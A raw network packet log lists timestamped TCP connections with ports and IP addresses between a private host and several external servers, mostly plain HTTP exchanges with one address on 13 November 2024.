Nov 13, 2024 20:39:20.400336981 CET	443	49722	40.115.3.253	192.168.2.5
Nov 13, 2024 20:39:20.400754929 CET	443	49722	40.115.3.253	192.168.2.5
Nov 13, 2024 20:39:20.400830984 CET	49722	443	192.168.2.5	40.115.3.253
Nov 13, 2024 20:39:20.400866032 CET	49722	443	192.168.2.5	40.115.3.253
Nov 13, 2024 20:39:20.420475006 CET	443	49721	40.126.32.76	192.168.2.5
Nov 13, 2024 20:39:20.420543909 CET	443	49721	40.126.32.76	192.168.2.5
Nov 13, 2024 20:39:20.420593977 CET	443	49721	40.126.32.76	192.168.2.5
Nov 13, 2024 20:39:20.420650959 CET	49721	443	192.168.2.5	40.126.32.76
Nov 13, 2024 20:39:20.420686960 CET	443	49721	40.126.32.76	192.168.2.5
Nov 13, 2024 20:39:20.420703888 CET	49721	443	192.168.2.5	40.126.32.76
Nov 13, 2024 20:39:20.421072960 CET	49721	443	192.168.2.5	40.126.32.76
Nov 13, 2024 20:39:20.421092987 CET	443	49721	40.126.32.76	192.168.2.5
Nov 13, 2024 20:39:20.421103954 CET	49721	443	192.168.2.5	40.126.32.76
Nov 13, 2024 20:39:20.421391010 CET	443	49721	40.126.32.76	192.168.2.5
Nov 13, 2024 20:39:20.421478033 CET	443	49721	40.126.32.76	192.168.2.5
Nov 13, 2024 20:39:20.423796892 CET	49721	443	192.168.2.5	40.126.32.76
Nov 13, 2024 20:39:20.502552032 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:20.502573013 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:20.502671957 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:20.502774000 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:20.502790928 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:20.502808094 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:20.502820969 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:20.502821922 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:20.502834082 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:20.502839088 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:20.502856970 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:20.502893925 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:20.504537106 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:20.509434938 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:20.793884039 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:20.793976068 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:20.811896086 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:20.811938047 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:20.817017078 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:20.817035913 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:20.817049026 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:20.817060947 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:20.817075968 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:20.817087889 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:20.817100048 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:20.817440033 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:21.617615938 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:21.617728949 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:21.924839020 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:21.929862976 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:22.021625042 CET	49723	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:22.021677971 CET	443	49723	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:22.021877050 CET	49723	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:22.022082090 CET	49723	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:22.022102118 CET	443	49723	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:22.211704969 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:22.211796045 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:22.211827993 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:22.211832047 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:22.211849928 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:22.211865902 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:22.211884975 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:22.211919069 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:22.211927891 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:22.211951971 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:22.211957932 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:22.211993933 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:22.212224960 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:22.212269068 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:22.212332010 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:22.212366104 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:22.212376118 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:22.212400913 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:22.212405920 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:22.212435007 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:22.212440014 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:22.212475061 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:22.213093042 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:22.213145018 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:22.213148117 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:22.213196039 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:22.376403093 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:22.376456976 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:22.376494884 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:22.376528978 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:22.376565933 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:22.376574993 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:22.376574993 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:22.376574993 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:22.376574993 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:22.376625061 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:22.376705885 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:22.376745939 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:22.376750946 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:22.376791000 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:22.376871109 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:22.376907110 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:22.376919031 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:22.376944065 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:22.376948118 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:22.376986980 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:22.377196074 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:22.377230883 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:22.377240896 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:22.377264977 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:22.377271891 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:22.377305984 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:22.492995024 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:22.493040085 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:22.493079901 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:22.493097067 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:22.493098021 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:22.493139982 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:22.493153095 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:22.493189096 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:22.493197918 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:22.493223906 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:22.493230104 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:22.493261099 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:22.493266106 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:22.493295908 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:22.493302107 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:22.493333101 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:22.493338108 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:22.493386984 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:22.494045019 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:22.494081020 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:22.494100094 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:22.494116068 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:22.494122028 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:22.494162083 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:22.540517092 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:22.540564060 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:22.540638924 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:22.540657997 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:22.609942913 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:22.609997034 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:22.610038996 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:22.610079050 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:22.610114098 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:22.610150099 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:22.610222101 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:22.610241890 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:22.610243082 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:22.610243082 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:22.610243082 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:22.610258102 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:22.610271931 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:22.610271931 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:22.610295057 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:22.610306025 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:22.610331059 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:22.610341072 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:22.610377073 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:22.610852957 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:22.610888958 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:22.610907078 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:22.610924959 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:22.610929966 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:22.610960007 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:22.610980034 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:22.611001968 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:22.657363892 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:22.657404900 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:22.657476902 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:22.657497883 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:22.726912975 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:22.726968050 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:22.727006912 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:22.727009058 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:22.727009058 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:22.727042913 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:22.727052927 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:22.727087021 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:22.727121115 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:22.727154016 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:22.727188110 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:22.727190971 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:22.727200031 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:22.727226019 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:22.727247000 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:22.727263927 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:22.727282047 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:22.727298975 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:22.727305889 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:22.727355957 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:22.727377892 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:22.727417946 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:22.727432013 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:22.727463961 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:22.728024960 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:22.728055954 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:22.728087902 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:22.728104115 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:22.774298906 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:22.774343967 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:22.774406910 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:22.774429083 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:22.783610106 CET	443	49723	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:22.783689976 CET	49723	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:22.786720037 CET	49723	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:22.786731958 CET	443	49723	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:22.787208080 CET	443	49723	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:22.796387911 CET	49723	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:22.839340925 CET	443	49723	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:22.844527006 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:22.844582081 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:22.844603062 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:22.844619989 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:22.844635010 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:22.844671965 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:22.844680071 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:22.844717026 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:22.844743013 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:22.844754934 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:22.844763994 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:22.844791889 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:22.844804049 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:22.844826937 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:22.844846964 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:22.844861984 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:22.844866991 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:22.844897032 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:22.844914913 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:22.844933033 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:22.844944954 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:22.844970942 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:22.844980955 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:22.845019102 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:22.845604897 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:22.845665932 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:22.891339064 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:22.891359091 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:22.891474962 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:22.960436106 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:22.960453987 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:22.960472107 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:22.960489035 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:22.960505009 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:22.960530043 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:22.960562944 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:22.960828066 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:22.960854053 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:22.960870028 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:22.960885048 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:22.960885048 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:22.960902929 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:22.960916996 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:22.960920095 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:22.960938931 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:22.960967064 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:22.961725950 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:22.961743116 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:22.961760044 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:22.961776018 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:22.961807013 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:22.961807013 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:22.961848021 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:23.009042978 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:23.009072065 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:23.009099960 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:23.009135962 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:23.017504930 CET	443	49723	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:23.017575979 CET	443	49723	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:23.017622948 CET	443	49723	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:23.017642021 CET	49723	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:23.017682076 CET	443	49723	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:23.017704010 CET	49723	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:23.017720938 CET	49723	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:23.021176100 CET	49675	443	192.168.2.5	23.1.237.91
Nov 13, 2024 20:39:23.021177053 CET	49674	443	192.168.2.5	23.1.237.91
Nov 13, 2024 20:39:23.043792963 CET	443	49723	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:23.043829918 CET	443	49723	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:23.044083118 CET	49723	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:23.044126034 CET	443	49723	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:23.044183016 CET	49723	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:23.077507973 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:23.077562094 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:23.077588081 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:23.077645063 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:23.077662945 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:23.077677965 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:23.077687979 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:23.077712059 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:23.077723980 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:23.077760935 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:23.078151941 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:23.078191996 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:23.078206062 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:23.078217030 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:23.078242064 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:23.078257084 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:23.078265905 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:23.078279972 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:23.078293085 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:23.078313112 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:23.078345060 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:23.078887939 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:23.079071045 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:23.130577087 CET	49673	443	192.168.2.5	23.1.237.91
Nov 13, 2024 20:39:23.141748905 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:23.141801119 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:23.141841888 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:23.141866922 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:23.141901016 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:23.142752886 CET	443	49723	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:23.142786980 CET	443	49723	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:23.142844915 CET	49723	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:23.142885923 CET	443	49723	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:23.142903090 CET	49723	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:23.142931938 CET	49723	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:23.161653042 CET	443	49723	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:23.161725044 CET	443	49723	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:23.161806107 CET	49723	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:23.161823988 CET	443	49723	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:23.161874056 CET	49723	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:23.163444042 CET	443	49723	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:23.163491011 CET	443	49723	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:23.163639069 CET	49723	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:23.163649082 CET	443	49723	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:23.163700104 CET	49723	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:23.194466114 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:23.194490910 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:23.194506884 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:23.194521904 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:23.194538116 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:23.194591045 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:23.194633961 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:23.194747925 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:23.194765091 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:23.194781065 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:23.194794893 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:23.194796085 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:23.194813013 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:23.194829941 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:23.194833994 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:23.194870949 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:23.195401907 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:23.195420027 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:23.195437908 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:23.195452929 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:23.195455074 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:23.195489883 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:23.201783895 CET	443	49723	13.107.246.45	192.168.2.5
